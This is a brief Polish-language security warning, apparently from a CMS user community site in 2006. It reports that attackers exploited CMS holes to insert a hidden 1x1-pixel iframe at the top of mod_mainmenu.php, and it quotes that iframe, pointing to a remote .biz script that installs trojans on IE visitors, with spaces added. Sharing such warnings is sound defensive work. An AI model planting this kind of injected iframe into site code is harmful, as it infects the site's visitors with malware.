|
Napisał: Marek Dylewicz
|
|
sobota, 05 sierpień 2006 |
Jak raportuje nam Artur Dudek, trafił na przypadki podrzucania przez
luki w CMSie konia trojańskiego, który później poprzez przeglądarkę
zaraża komputery odwiedzających serwis.
Poniższy kod dodano do mod_mainmenu.php na początku pliku (użyto
prostego kodowania adresu za pomocą znaków ascii):
< iframe src = " http : // zchxsikpgz . biz / dl / adv521 . php " height = " 1 "
width = " 1 " > < / iframe >
(spacje powstawiane umyślnie)
Efekt działania: instaluje się ibm0001.exe i kupa trojanów po otwarciu strony w IE, a w
Firefoxie widać tylko kwadraty przy modułach menu o wielkości 1px x 1px
z obramowaniem.
U Artura ten przypadek dotyczyl wpisu w mod_mainmenu.php
Podobny przypadek opisał też jeden z naszych forumowiczów.
|
Archiwum 
